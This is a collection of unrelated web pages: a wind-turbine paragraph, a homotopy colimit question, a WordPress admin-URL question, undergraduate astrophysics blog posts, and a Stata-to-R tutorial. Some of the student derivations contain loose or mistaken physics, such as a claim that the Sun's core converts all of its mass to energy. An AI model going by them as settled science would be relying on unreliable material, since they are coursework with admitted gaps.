Wind is not constant, not only in its speed but also in its direction, so a wind turbine practically always works in a dynamic mode, constantly changing its orientation. At the same time the rotor is spinning, and it is known that any rapidly rotating body seeks, like a spinning top, to keep the direction of its axis of rotation unchanged and counteracts any attempt to deflect this axis. If you force the end of the axis to deviate in either direction, it will resist, and its end will move in a direction perpendicular to the applied force. This is called gyroscopic torque; its value depends on the mass, diameter and rotation rate of the rotor. Recall also that the load on the blades grows with rotation rate because of centrifugal force.
And since the power of the rotor depends only weakly on the tip-speed ratio, one chooses a blade configuration for which the gyroscopic torque is not too large while the rotation rate is still reasonably high.
Three blades are exactly such a compromise for wind turbines; the tip-speed ratio is about 6 to 7 on average.
https://math.stackexchange.com/questions/3263796/homotopy-colimit?noredirect=1
# Homotopy colimit
Some time ago I asked this question. I am trying again to get an understanding of the definition of the homotopy colimit of a diagram of topological spaces.
One of the answers at the above says
For example, homotopy colimits represent "homotopy coherent cones"
referring me to papers by Michael Shulman and Emily Riehl for the definitions.
I am finding difficulty with the high level of generality of the definitions in both of these sources. My first question is whether there is a simpler definition of a homotopy coherent cone when it is over a finite diagram of CW-topological spaces - in particular where the maps are all cofibrant inclusions?
I am particularly interested in whether my following intuition is correct:
A homotopy coherent cone on a diagram is one such that we do not necessarily have commutativity, but we have commutativity up to homotopy, and then commutativity of those homotopies up to homotopy, and then commutativity of those up to homotopy, etc.
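In low degrees that intuition does match the usual unpacking of the definition. A sketch of the first levels of data for a homotopy coherent cone with apex $C$ over a diagram $F$ indexed by a small category $I$ (the notation is mine, not the question's):

$$f_i : F(i) \to C \quad \text{for each object } i \text{ of } I,$$
$$H_\alpha : F(i) \times [0,1] \to C, \quad H_\alpha(-,0) = f_j \circ F(\alpha), \quad H_\alpha(-,1) = f_i \quad \text{for each arrow } \alpha : i \to j,$$
$$\text{for each composable pair } \beta\alpha : \text{ a two-parameter homotopy filling the triangle formed by } H_{\beta\alpha},\ H_\beta \circ (F(\alpha) \times \mathrm{id}),\ H_\alpha,$$

and so on, with an n-parameter homotopy for each string of n composable arrows.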
If this is not correct, is there a similar intuition available for homotopy coherent cones?
https://www.wptricks.com/question/custom-post-types-how-to-add-query-args-to-links-to-cpt-admin-submenu/
Question
I have a custom post type I’ve created, and I’ve added an admin submenu page to display some data it generates. So far, so good. I’m displaying the data with my local extension of WP_List_Table, and I want one of the columns to link to a detailed view of the item in the row. So,
    add_submenu_page( 'edit.php?post_type=cwr_ticket_page',
        __( 'Tickets', $this->plugin_text_domain ),        // page title
        __( 'Sold Tickets', $this->plugin_text_domain ),   // menu title
        'manage_options',                                  // capability (assumed; dropped from the original snippet)
        'cwr-tickets',                                     // menu slug (matches page=cwr-tickets below)
        array( $this, 'load_ticket_list_table' )           // callback
    );

“Sold Tickets” correctly shows up as a sub-menu on my “Ticket Pages” admin menu. The resulting url is http://localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&page=cwr-tickets, and that page correctly renders my table, all nicely using WP styles, with sortable columns and pagination, etc…. But one of my columns is “Details” and I want it to contain a link to a deeper view of the data represented in the given row. So for the entries in my “Details” column, I want something like

    <a href="http://localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&page=cwr-tickets&view=details&ticketID=abc123">view</a>

The question is, how to build that URL. I thought I could use add_query_arg, but it’s behaving oddly. My column_default method override looks like this:

    public function column_default( $item, $column_name ) {
        switch ( $column_name ) {
            ...
            case 'details':
                $args = array(
                    'view'     => 'details',
                    'ticketID' => '12345' // placeholder for development
                );
                return '<a href="' . esc_url( add_query_arg( $args,
                    menu_page_url( 'cwr-tickets', false ) ) )
                    . '">View</a>';
            ...
        }
    }
I’ve tried it both with and without the esc_url wrapper, but either way, it ends up moving the existing page query arg to the end, and prepending it with #038; instead of the ampersand. That is, I get
<a href="//localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&views=details&ticketID=12345#038;page=cwr-tickets">View</a>
By the way, I’m in no way wed to this use of menu_page_url and add_query_arg; the question is, how to (properly / the WordPress way) construct this CPT admin submenu URL for the links?
http://ericdoesastrophysics.blogspot.com/2011/11/
# Two-Body Orbits: Where's The Centre of Mass?
Second Authors: Nathan, Lauren
Introduction
Consider a problem of a planet orbiting a star. It's easy to see from Newtonian gravitation that they exert a force on one another. But then, how, according to Kepler's Third Law can we say the planet orbits the star alone? The star cannot remain fixed while feeling a force. In order for Newton's Laws to hold, we must say that they both orbit a mutual centre of mass. Using conservation of momentum, we can determine how far each body truly is from this centre of mass.
Methods
In order to balance forces, we notice that the planet and the star must be at opposite ends of their orbits at all times as seen in the following picture (not to scale). It follows from this that they have the same orbital period and the same angular velocity.
We know that linear momentum is equal around the centre of mass, such that:
$m_{p}v_{p}=m_{*}v_{*} \\ m_{p}a_{p}\omega=m_{*}a_{*}\omega$
Dividing through, we get the relationship
$\frac{m_{p}}{m_{*}}=\frac{a_{*}}{a_{p}}$
Rearranging and using the mean semimajor axis, a, we can see that
$\frac{m_{p}}{m_{*}}=\frac{a_{*}}{a-a_{*}} \\ \\ \frac{m_{p}}{m_{*}}a=(1+\frac{m_{p}}{m_{*}})a_{*} \\ \\ a_{*}=\frac{m_{p}}{m_{p}+m_{*}}a$
$\frac{m_{p}}{m_{*}}=\frac{a-a_{p}}{a_{p}} \\ \\ (\frac{m_p}{m_*}+1)a_p=a \\ \\ a_p=\frac{m_*}{m_p+m_*}a$
Conclusion
We have shown here that the star does indeed orbit the centre of mass, just as the planet does. However, looking at these equations carefully, we find that except for very massive planets, the semimajor axis of the star's orbit is roughly zero and the semimajor axis of the planet's orbit is roughly equal to the mean semimajor axis. As a result, we find that we can in fact use the assumptions implicit in Kepler's Law.
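As a sanity check on these formulas, a short sketch using rough textbook values for the Sun-Jupiter system (the numbers are approximate and mine, not the post's):

```python
# Semimajor axes about the common centre of mass:
#   a_* = m_p / (m_p + m_*) * a   and   a_p = m_* / (m_p + m_*) * a
# Approximate values for the Sun-Jupiter system.
m_star = 1.99e30      # kg
m_planet = 1.90e27    # kg
a = 7.78e11           # mean semimajor axis, m

a_star = m_planet / (m_planet + m_star) * a
a_planet = m_star / (m_planet + m_star) * a

print(f"a_* = {a_star:.2e} m  (compare the solar radius, about 7e8 m)")
print(f"a_p = {a_planet:.2e} m (essentially the full semimajor axis)")
```

Even for a planet as massive as Jupiter, the star's orbit about the centre of mass is only about the size of the star itself, which is why the planet-only approximation works so well.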
# The Death of a Star
Second Authors: Nathan, Lauren
Introduction
We know how stars are formed to a certain extent and that while they are on the main sequence, they are supported by hydrostatic equilibrium. However, when a star moves off the main sequence and can no longer support itself, what happens? We assume that at this point, the core of the sun has converted all of its mass to energy and is now undergoing gravitational collapse.
Methods
We know that the Sun generates energy throughout its lifetime at a rate of:
$L_{\odot }=4 \times 10^{33} erg/s$
Assuming that the sun uses up the entire mass of its core (10% of a solar mass) as it undergoes fusion, and converts energy with 0.7% efficiency, we can determine the total energy it produces in its lifetime with
$E=0.007\Delta mc^{2}=0.007\left ( 2 \times 10^{32}g \right )\left ( 9 \times 10^{20} cm^{2}/s^{2} \right )=1.26 \times 10^{51} ergs$
Dividing this number by the rate of energy production, we can determine the time it takes for the Sun to use all of its mass available for fusion. This time is
$\frac{1.26 \times 10^{51} ergs}{4 \times 10^{33} ergs/s}=3.15 \times 10^{17}s=9.99 \times 10^{9} years$
Now we know the core will collapse, but it won't collapse indefinitely. We find that the core collapses to the point that the interparticle spacing is on the order of the de Broglie wavelength. Since electrons have smaller momentum (and hence a longer de Broglie wavelength) than protons of equal energy, electrons are the first to reach this critical density. We can calculate this using the equations:
$\newline E=\frac{1}{2}m_{e}v^{2}\newline \newline v=\sqrt{\frac{2E}{m_{e}}}\newline \newline \lambda=\frac{h}{mv}=\frac{h}{\sqrt{2Em_{e}}}, \: E = kT$
It is easy to tell that we have one particle per cubic de Broglie wavelength. So we have:
$N=\left ( \frac{\sqrt{2m_{e}kT}}{h} \right )^{3}$
The actual value is 8 times this, for reasons I can't remember, but Nathan tells me Professor Johnson said the factor of 8 was okay to include in our calculations. So multiplying this by the mass of a hydrogen atom and using T = the temperature of the sun's core, we get density
$\rho = 8\frac{(2m_{e}kT)^{\frac{3}{2}}}{h^{3}}m_{H}\approx 360 \; g/cm^{3}$
Which is more than twice the current maximum density of the sun's core.
Conclusions
We find that by converting 0.7% of the mass of the sun's core into energy, the sun's lifetime is roughly 10 billion years, which agrees with what scientists have predicted. The density of the core after collapse will also be far greater than the current density of the sun's core, which is reasonable or it would not be able to support the sun post-collapse.
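The arithmetic above is easy to reproduce; a sketch in cgs units, using the same inputs as the text and an assumed core temperature of 1.5e7 K (the exact temperature used in the post is not stated, so the final density comes out near, but not exactly at, the quoted 360 g/cm^3):

```python
# Reproduce the lifetime and collapse-density estimates from the text (cgs units).
L_sun = 4e33          # erg/s
M_core = 2e32         # g, roughly 10% of a solar mass
c = 3e10              # cm/s
eff = 0.007           # fraction of core mass converted to energy

E = eff * M_core * c**2
t = E / L_sun
print(f"E = {E:.2e} erg, lifetime = {t:.2e} s = {t / 3.15e7:.2e} yr")

# Electron-degeneracy density estimate: rho = 8 * (2 m_e k T)^(3/2) / h^3 * m_H
m_e = 9.11e-28        # g
k = 1.38e-16          # erg/K
h = 6.63e-27          # erg s
m_H = 1.67e-24        # g
T = 1.5e7             # K, assumed core temperature

rho = 8 * (2 * m_e * k * T)**1.5 / h**3 * m_H
print(f"rho = {rho:.0f} g/cm^3")
```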
# An Interview With an Astrophysicist: The Postdoc
As some readers may know, this past summer I had the privilege of being able to work for Dr. Andy Goulding at the Smithsonian Astrophysical Observatory. Dr. Goulding is a first year Smithsonian Research Fellow in the High Energy Astrophysics division. He did his PhD work in AGN activity at the University of Durham, UK in the fall of 2010 before moving to Boston as a postdoc. Working with him was a wonderful educational experience that I'd happily do over if I had the chance. He gave me a look into the life of a researcher and how much research differs from course work.
We've vaguely kept in touch since September and he generously agreed to answer a few questions on his career for me. Of course, given the title of this blog, the first question was obvious. He took a lot of time in answering these questions, and I definitely learned some new things. For example, I had no idea that there was a difference between a postdoctoral research associate and a fellow.
What is the difference between an astronomer and an astrophysicist at this point in time? Which, if you have a preference, are you?
From a professional point of view, this is really semantics. People have degrees/PhDs in astronomy and/or astrophysics - it depends on institution. However, it is more likely that someone who is an amateur (non-PhD) is considered to be an astronomer. Classically, an astrophysicist attempts to understand and interpret the astronomical observations through application of physics. My PhD is in astrophysics, so in the strictest sense, I am an astrophysicist.
What are your primary areas of research as an astronomer/astrophysicist? How did you get interested in them?
Black hole growth and galaxy evolution. Black hole physics was considered a "popular science" in the 1990s, so when I was younger it was very easy to pick up a book in the local store, and this naturally progressed from a hobby into a profession.
How did you get into astronomy/astrophysics? What did you study as an undergrad? Where did you go to graduate school and why?
As an undergrad I studied Theoretical Physics - this involved particle theory, supersymmetry, advanced quantum theory and general relativity - this had little to do with astronomy, so it does not necessarily follow that your undergrad major must be your graduate major. Despite offers from several graduate schools in the UK, I decided to stay at my undergrad institution, Durham University, as it has a fantastic worldwide reputation as well as the largest astrophysics/cosmology department in the UK.
What precisely is a postdoctoral fellowship? How does it fit in to a career in astronomy/astrophysics?
Once a predoc has completed their PhD, they will generally look for a post-doctoral position at a different institution - these come in 2 flavors: (1) research associate and (2) fellowship. A research associate position is when a group/faculty has money available to employ a post-doc to carry out their specific research and help pre-doc students within the research group. A fellowship is generally a highly sought-after monetary prize which may or may not be linked with a specific institution and allows the holder to carry out the research of their choice - this is often predicated on the research proposal which is submitted in order to win the fellowship.
How has your career played out? Is it what you expected? What is the typical career arc of an astronomer/astrophysicist?
At this stage, I am not really in a position to answer this question. I completed my PhD in late 2010, and moved to Harvard shortly after to begin my fellowship which I had been accepted for earlier in the year. As I have only been here for a little over 12 months, it is not really possible to answer this question. 'Typically', an astrophysicist will expect to go from grad student (3-6 years) -> post-doc associate (2-3 years) -> [post-doc associate (2-3 years) ->] post-doc fellow (2-3 years) -> [post-doc fellow (2-3 years) ->] associate professor (3-10 years) -> tenured professor (indefinite). N.b., I added the other post-doc positions as some people prefer to stay as post-docs for longer periods of time to help with their publication records to move to the next stage and/or keep their teaching duties lower.
How have your goals evolved over the course of your career, if they have at all?
As I said above, my career is still becoming established. As I skipped the post-doc associate stage, and gained a fellowship on my first position, my current goal (for next year) will be to win a second prize fellowship to further expand my publication record.
My Masters degree is in theoretical physics; many people with this degree become statistical analysts and/or military defense specialists.
What is the best part of being an astronomer/astrophysicist? The worst?
This is quite an interesting question as I'm pretty sure that you will get a different answer from every person. Being an astrophysicist is all about 'puzzle solving'; we all have some intrinsic desire to answer the questions which are the most difficult to answer, so when we answer them, or move a step closer to answering them, this is the 'best part of being an astronomer'. However, it can also be the worst: you can find yourself working on one project for 6 months and then finding out that you have gone down completely the wrong avenue, and you have to start over. Of course, there are certainly perks too - for example, we travel to very exotic places (a lot); telescopes are not generally in well-populated areas, so you get to travel to places like Hawaii, the Canary Islands, Australia, the Atacama desert (Chile).
What can aspiring astronomers/astrophysicists do to make things easier for themselves? i.e., what do you wish you'd known as an undergrad?
Of course, get very high grades and after that, you need something on your cv that will get you noticed (e.g., a summer studentship in a department)
What has been the most difficult stage of your career so far? What have been some notable inspirations along the way?
At this point in time, astrophysics is struggling for funding from the government due to certain projects costing significantly more than was originally budgeted for; as such, further funding that would have been relatively easy to propose for 5 years ago is not forthcoming. Hence, much more time must be put into proposing for the next year's projects, and this slows down the current research. This is not necessarily 'difficult' but it is certainly frustrating.
Any final thoughts for the undergraduate astronomy student?
Astronomy as an undergraduate student and astronomy research are nothing alike (as you have already seen, Eric).
# Star Formation: Timescale and Stability
Introduction
Star formation is governed by the collapse of a cloud of particles into a gravitationally bound sphere which we call a star. The radius of the cloud at which this occurs is called the Jeans Length, where the gravitational force of the cloud overcomes the thermal energy causing it to expand. Here we examine the time scale of such a collapse and also calculate the Jeans Length.
Methods
In order to determine the time it takes for this collapse to occur in terms of the mass and size of the cloud, we consider a cloud of mass M and a test particle a distance away from it. We assume the cloud has a mass given by
$M=\bar{\rho }\frac{4}{3}\pi r^{3}$
where r is the length of the major axis for an elliptical orbit of eccentricity 1. By assuming such a geometry for the free fall, we can initially approximate the orbit to a straight line with a mass M at one end and our test particle at the other. Since this is a free fall, we can also approximate the time tff to be half the orbital period we get from Kepler's 3rd law (a = 1/2 r)
$T^{2}=\frac{4\pi ^{2}a^{3}}{GM}$
Substituting our mass formula into this equation, we get
$t_{ff}=\frac{1}{2}\sqrt{\frac{4 \pi^{2}a^{3}}{G\frac{4}{3}\pi\bar{\rho}\left ( 2a \right )^{3}}}=\sqrt{\frac{3 \pi}{32G\bar{\rho}}}$
The implicit assumptions are that we can even call this half an orbit, as an eccentricity 1 orbit is parabolic and therefore not periodic, and that we can approximate this orbit to a straight line. Now in order to find the Jeans Length, we equate this to the dynamical time, or the time it takes a sound wave to cross this distance. Let's define this as
$t_{dyn}=\frac{r}{c_{s}}$
Equating the two, we get the radius at which the cloud will undergo gravitational collapse
$r=\sqrt{\frac{3\pi c_{s}^{2}}{32G\bar{\rho}}}$
For an isothermal gas of constant density, this length signifies the minimum radius at which it will continue to be a gas and not collapse into a much denser formation. This is the Jeans Length to an order of magnitude. The actual formula for the Jeans Length is
$R_{J}=\sqrt{\frac{\pi c_{s}^{2}}{G\bar{\rho }}}$
Conclusions
We have here calculated the free fall time for star formation as well as the radius at which the gravitational force between interstellar dust particles takes over. It is important to note that since the density is radius dependent, the Jeans Length is not constant for all star forming clouds, but varies even with the change of radius due to collapse, and we have
$R_{J}\propto r^{\frac{3}{2}}$
If we consider a cloud that starts out at the Jeans Length for its particular conditions, by the time it reaches half this radius the Jeans Length has decreased by a factor of √8. As a result, the initial Jeans Length may actually govern how far the cloud will collapse for a given mass and radius.
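To attach rough numbers to these formulas, a sketch assuming a cold molecular cloud with an isothermal sound speed of about 0.2 km/s and a mean density of 1e-19 g/cm^3; both values are illustrative assumptions of mine, not taken from the post:

```python
import math

# Free-fall time and Jeans length for an assumed cold cloud (cgs units).
G = 6.67e-8           # gravitational constant, cm^3 g^-1 s^-2
rho = 1e-19           # assumed mean density, g/cm^3
c_s = 2e4             # assumed sound speed, cm/s (about 0.2 km/s)

t_ff = math.sqrt(3 * math.pi / (32 * G * rho))
R_J = math.sqrt(math.pi * c_s**2 / (G * rho))

yr, pc = 3.15e7, 3.09e18
print(f"t_ff = {t_ff:.2e} s = {t_ff / yr:.2e} yr")
print(f"R_J  = {R_J:.2e} cm = {R_J / pc:.2f} pc")
```

With these assumptions the collapse takes a couple of hundred thousand years and the Jeans length is of order a tenth of a parsec.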
# Becoming An Astronomer
We were recently, or not so recently—I'm very good at procrastinating—assigned a multi-part blogging to find out what it truly means to be an astronomer. I realise as a sophomore astrophysics major that I still don't understand the specifics of what being an astronomer entails or means to me. To quote my friend Alexa,
I just want to be one. So much. “Space” is, if you think about it, everything but Earth. When we study it, we’re pausing our narcissistic tendencies for just a moment. We’re not everything; we’re part of everything. Ignoring that is shameful.
She stated in the best way possible what attracts me to astronomy, but that still doesn't mean I know what astronomy is. Right now I just think of astronomy as some nebulous loosely defined field of Things I Would Like To Do Because They Are Amazing, but that's not an acceptable answer to the question. So without further delay I shall attempt to synthesise my thoughts on the topic.
The point of being a professional astronomer, in my experience, is to contribute understanding of what the universe is, how it is structured, how it came to be, and what its future might hold. Most likely this is because the first astronomer I ever met was a professor of cosmology. I've come to accept that he's probably the reason my main research interest tends to observational cosmology. Of course, this is a very broad and relatively unhelpful answer to the astronomer question. Sure, that's the intention, but how do we get there?
I think it's safe to assume that the journey to becoming a professional astronomer begins as an undergrad, or if you're very lucky, as a high school student. I think mine was a bit of both, as I did get the opportunity as a junior to do some busy work for he of blog title fame. But that was a week long, and although it was some exposure I doubt it's how careers in astronomy start. Careers in astronomy, at least for a Caltech student, probably start with a SURF fellowship. I know SURF was my first real look at what an astronomer does. I sat alone in an office 8-9 hours a day, writing code in a language I'd never seen before to analyse data I didn't understand, and I had fun doing it. I think that enjoyment is what sets the astronomer apart from the average person.
Then the natural course of things is to go to graduate school. This is where you decide What You Want To Do With Your Life. As far as I know, you don't have to decide right away. Unless you're in the UK in which case you need to know what you want to study before you've learnt anything about it. At least, that is what my SURF mentor who is English tells me. Being a grad student requires doing semi-independent research under the guidance of a faculty member who works on a similar topic. You'll probably start to hate your field at some point during this process, but hopefully you'll get over it soon. Next is the postdoctoral fellow. I have no idea what a postdoc does. Don't tell my SURF mentor that because he is one.
I believe your career options then become a) professor at an academic institution, b) research scientist some place like the SAO, or c) finance. I'm sure there are more options, I'm just uneducated in that side of things. The first two options strike me as pretty similar except the professor track astronomer will probably have to teach at some point or another. This part is where you get to move on to independent research in topics that interest you. You might find out something that only you know about, and that's a rewarding experience. Although any work in astronomy is rewarding if it's what's truly exciting and inspirational to you.
I have given my impression of what it takes to become an astronomer. So once again, we're back to the question of what does it mean to me to be an astronomer? It's going to take a lot of work. Astronomy, as it turns out, is hard. But the work will be worthwhile because I'll be learning how the universe works, or how we think the universe works. Maybe I'll end up amending some of that knowledge. Who knows? Being an astronomer means getting excited about the mysteries of space and our tiny place in it. It means realising how small we really are in the grand scheme of things, accepting that, and moving on to understand why. Most of all, it means that when your friend starts talking about M83 and means the band, this is all you can see.
# Is There Life On Maaaars?
I've been having an uncharacteristic moment of curiosity lately, and that curiosity is about life outside Earth. Usually I don't care. I'm much more of a "let's explore and discover the physical laws of the universe" kind of guy. But today, it's all about life out there, and why not? Some pretty interesting things have happened in the last week.
1. ESA's Mars500 Simulation Ended
So I have to admit, I knew nothing about this project until I read the article today. Doesn't prevent me from thinking it's amazing. In short, a crew of 6 was stuck together in an in-lab "spacecraft" for 17 months, performing the tasks necessary for a real mission to Mars including "entering" orbit and "landing" on Mars. Conditions were controlled exactly as if they were actually travelling and they completed experiments on the problems brought about by long space missions. Maybe this will open up opportunities for an actual space mission to Mars after studying the physiological and psychological effects of longterm isolation. Very cool. Here is a compiled video diary of their time during the simulation:
2. A New Way to Look for Aliens
Avi Loeb and Edwin Turner of the Harvard-Smithsonian Center for Astrophysics and Princeton University, respectively have suggested a new way to look for extraterrestrial intelligence: doing it the same way we find civilisation on earth. They intend to look for the lights from their cities. These two operate on the assumption that life evolves in the light of the nearest star and that any intelligent life forms would have learned to make light and extend their days. They would have to find a way to filter out the light from the star. They suggest that one method of doing this is to look for bright areas in a dark phase of the planet's orbit (think of the dark side of the moon). Unfortunately, this method would require far more powerful telescopes than we now have, but it's definitely a start.
3. Organic Molecule "Sweet Spots"
This isn't technically astrophysics; however, I think it still has a place in a post about life outside Earth. Astrobiologists at Rensselaer (one of the reasons I didn't apply there was I couldn't spell it on the first try) have discovered areas of higher methanol concentration surrounding some, but not all, newly formed stars. Methanol is apparently one of the precursors to more complex organic molecules which may give rise to life. They call this a "sweet spot" of physical conditions that allow these organic molecules to form. Even more interestingly, from studying concentrations in comets, they have determined that our solar system is painfully average in the methanol department. In other words, we're not all that special and life still managed to appear on Earth. The implication here is there may be other solar systems out there with greater methanol concentrations that lend themselves more easily to the appearance of life than our own!
Sources
http://www.sciencedaily.com/releases/2011/11/111106142036.htm
http://www.esa.int/SPECIALS/Mars500/
http://www.sciencedaily.com/releases/2011/11/111103190356.htm
http://www.sciencedaily.com/releases/2011/11/111102190028.htm
# Hydrostatic Equilibrium and the Sun
Abstract
We would like to know how the sun is being "supported". We assume that this mechanism is hydrostatic equilibrium, but to be sure we work through the derivation.
Introduction
We know that the sun is somehow being prevented from gravitational contraction. Our theory is that it is supported by hydrostatic equilibrium, which means that the internal pressure provides an opposing support force. We calculate the gravitational force on a mass shell, the pressure required to balance it, and then derive the force equation for hydrostatic equilibrium.
Methods and Results
We first assume the Sun to be a spherical gas cloud with density ρ(r). We consider a differential mass shell of this sphere with radius r. We recall that the volume of a sphere is 4/3 πr³ and that the differential volume is its derivative. Then we get a differential mass dM:
$dM=\rho \left ( r \right )4\pi r^{2}dr$
We know the equation for universal gravitation:
$F=-\frac{GMm}{r^{2}}$
Here we let M be the total mass enclosed by the mass shell and m be the differential mass element. As a result, we get the differential gravitational force to be:
$dF_{g}=-\frac{GM\left ( r \right )\rho \left ( r \right )4\pi r^{2}dr}{r^{2}}=-GM\left ( r \right )\rho \left ( r \right )4\pi dr$
We know that pressure is equal to force divided by area. So we can say:
$dP\left ( r \right )=\frac{dF_{g}}{A}=-\frac{GM\left ( r \right )\rho \left ( r \right )4\pi dr}{4\pi r^{2}}=-\frac{GM\left ( r \right )\rho \left ( r \right )dr}{r^{2}}$
Now dividing by dr on both sides of the equation we arrive at the equation of hydrostatic equilibrium:
$\frac{dP(r)}{dr}=-\frac{GM(r)\rho (r)}{r^{2}}$
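As a quick numerical check (an addition, not part of the original derivation), the sketch below integrates this equation for a constant-density sphere with the Sun's mass and radius and compares the resulting central pressure with the analytic value $P_{c}=\frac{2}{3}\pi G\rho ^{2}R^{2}$. The constant-density profile and all numerical values are simplifying assumptions for illustration only; the real Sun is strongly centrally condensed.

```python
# Minimal sketch: integrate dP/dr = -G M(r) rho / r^2 inward from the surface
# of a constant-density "Sun" and compare with the analytic central pressure.
import numpy as np

G = 6.674e-11                     # m^3 kg^-1 s^-2
R = 6.957e8                       # solar radius, m
M_sun = 1.989e30                  # solar mass, kg
rho = M_sun / (4 / 3 * np.pi * R**3)   # mean density, kg/m^3 (assumed constant)

r = np.linspace(1.0, R, 100_000)       # start just off r = 0 to avoid division by zero
M_enclosed = 4 / 3 * np.pi * rho * r**3
dPdr = -G * M_enclosed * rho / r**2

# P(R) = 0 at the surface, so the central pressure is minus the integral of dP/dr.
P_center = -np.trapz(dPdr, r)
P_analytic = 2 / 3 * np.pi * G * rho**2 * R**2

print(f"numerical  P_c = {P_center:.3e} Pa")
print(f"analytic   P_c = {P_analytic:.3e} Pa")
```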
Conclusions
We have derived from simple physical laws that the equation for hydrostatic equilibrium is a plausible explanation for the way the sun is supported. A quick search shows that we are indeed correct. Hooray!
https://fsolt.org/blog/2018/08/15/switch-to-r/

### How to Switch Your Workflow from Stata to R, One Bit at a Time
Wednesday, 15 August 2018
A recent exchange on Twitter reminded me of my switch to R from Stata. I’d started grad school in 1999, before R hit 1.0.0, so I’d been trained exclusively in Stata. By 2008, I had way more than the proverbial 10,000 in-seat hours in Stata, and I knew all the tricks to make it do just what I wanted. I was even Stata Corp.’s on-campus rep at my university. Still, I’d started dabbling in R. Then as now, there were specific things R could do that Stata couldn’t.1 But how to get those advantages without throwing out my hard-earned skills and starting over as a complete n00b? The answer was: a little bit at a time.
Fortunately, it’s not difficult to switch back and forth within a given project, so you can start bringing some R to your Stata-based workflow while leaving it mostly intact. Then, if and when you find yourself doing more in R than in Stata, you can flip and start using Stata from within R.
So, install R and let’s get you started.
## Running R from Stata
The trick to running R from within your do-file is first to save the data you want to pass to R, then call the .R file with the commands you want to run in R (the “R script”), then—if necessary—reload the R output into Stata.
While it’s also possible to use Stata’s shell command to run an R script (for illustrative purposes, let’s pretend it’s called my_script.R), Roger Newson’s rsource module makes it particularly easy. Install it as follows:
ssc install rsource, replace
Unfortunately, the information rsource needs about your R installation is a bit different depending on your OS, but once installed, adding this platform-independent code to your do-file will run the script:
if "c(os)'"=="MacOSX" | "c(os)'"=="UNIX" {
rsource using my_script.R, rpath("/usr/local/bin/R") roptions("--vanilla"')
}
else { // windows
rsource using my_script.R, rpath("c:\r\R-3.5.1\bin\Rterm.exe"') roptions("--vanilla"') // change version number, if necessary
}
Of course, you could choose to skip the whole if-else and just include the line that runs on your machine, but that’s not doing any favors to your collaborators or anyone else trying to reproduce your results. You might also just prefer to specify the rpath and roptions in your profile do-file,2 but again, then you’ll need to let others know to do the same or they won’t be able to run your do-file.
Note, too, that if you don’t have much R code to run, it might be easiest to just keep it in your do-file rather than using a separate script. You can do this using the terminator option to rsource, though a downside to this approach is that it doesn’t allow you to if-else the rsource command by your OS. In the do-file below, I also use the regsave module to save my results to pass them to R; install it using ssc install regsave, replace.
clear
set more off
sysuse auto, clear
gen wt = weight/1000
regress mpg wt displacement foreign trunk headroom length
regsave using "~/Desktop/R_Stata/auto_results.dta", replace
rsource, terminator(END_OF_R) rpath("/usr/local/bin/R") roptions(`"--vanilla"')
// rsource using my_script.R, rpath(`"c:\r\R-3.5.1\bin\Rterm.exe"') roptions(`"--vanilla"') // use this line instead if you run a windows box

library(tidyverse);   # collection of all-around useful R packages
library(haven);       # for importing Stata datasets
library(dotwhisker);  # easy and beautiful regression plots, imho

auto_results <- read_dta("~/Desktop/R_Stata/auto_results.dta") %>%  # read the results saved by regsave above
    rename(term = var,
           estimate = coef,
           std.error = stderr) %>%
    filter(term != "_cons");

dwplot(auto_results);

ggsave("~/Desktop/R_Stata/auto_results.png", width = 5, height = 4);
END_OF_R
## Running Stata from R
So maybe you’ve gotten to the point where you spend more of your time in R than in Stata, but there’s still a few parts of your work that you just want (or need!) to keep in Stata. Running a do-file (my_do_file.do) from inside your R script is easy with Luca Braglia’s RStata package:
if (!require(RStata)) install.packages("RStata"); library(RStata) # this will install RStata if not already installed
stata("my_do_file.do",
stata.path = "/Applications/Stata/StataMP.app/Contents/MacOS/stata-mp", # yours probably differs: use the chooseStataBin() command on windows or linux machines; on Macs, right click on the Stata app, select "Show Package Contents", then see what's in the Contents/MacOS/ directory
stata.version = 13) # again, specify what _you_ have
On this side as well, it’s possible to set the arguments just once, in your .Rprofile file. In my case, these two lines do the trick:
options("RStata.StataPath" = "/Applications/Stata/StataMP.app/Contents/MacOS/stata-mp")
options("RStata.StataVersion" = 13)
Since Stata isn’t free and open-source, it’s even more likely that others will have different setups anyway, so this may make the most sense. Be sure to comment your code to clue people in, though.
If you just want to use a single Stata command RStata::stata3 will do that for you, too, with no need for a do-file. From the RStata package documentation:
library("RStata")
# remember to set RStata.StataPath & RStata.StataVersion in your .Rprofile first! See https://www.rdocumentation.org/packages/RStata/
## Data input to Stata
x <- data.frame(a = rnorm(3), b = letters[1:3])
stata("sum a", data.in = x)
## . sum a
##
## Variable | Obs Mean Std. Dev. Min Max
## -------------+--------------------------------------------------------
## a | 3 .0157619 .6048126 -.3437544 .7140365
## Data output from Stata (e.g., obtain 'auto' dataset)
auto <- stata("sysuse auto", data.out = TRUE)
## . sysuse auto
## (1978 Automobile Data)
head(auto)
## make price mpg rep78 headroom trunk weight length turn
## 1 AMC Concord 4099 22 3 2.5 11 2930 186 40
## 2 AMC Pacer 4749 17 3 3.0 11 3350 173 40
## 3 AMC Spirit 3799 22 NA 3.0 12 2640 168 35
## 4 Buick Century 4816 20 3 4.5 16 3250 196 40
## 5 Buick Electra 7827 15 4 4.0 20 4080 222 43
## 6 Buick LeSabre 5788 18 3 4.0 21 3670 218 43
## displacement gear_ratio foreign
## 1 121 3.58 Domestic
## 2 258 2.53 Domestic
## 3 121 3.08 Domestic
## 4 196 2.93 Domestic
## 5 350 2.41 Domestic
## 6 231 2.73 Domestic
## Data input/output
(y <- stata("replace a = 2", data.in = x, data.out = TRUE))
## . replace a = 2
## (3 real changes made)
## a b
## 1 2 a
## 2 2 b
## 3 2 c
And you can embed several Stata commands in your R code as well:
data <- data.frame(y = rnorm(100), x1 = rnorm(100), x2 = rnorm(100))
stata("
sum y x1 x2
reg y x1 x2
", data.in = data)
## .
## . sum y x1 x2
##
## Variable | Obs Mean Std. Dev. Min Max
## -------------+--------------------------------------------------------
## y | 100 -.2265245 .9279628 -2.140921 3.456609
## x1 | 100 .0235107 .9654566 -2.089315 2.085599
## x2 | 100 -.1990955 1.054259 -2.800112 1.768455
## . reg y x1 x2
##
## Source | SS df MS Number of obs = 100
## -------------+------------------------------ F( 2, 97) = 1.25
## Model | 2.14131244 2 1.07065622 Prob > F = 0.2912
## Residual | 83.1090619 97 .856794452 R-squared = 0.0251
## -------------+------------------------------ Adj R-squared = 0.0050
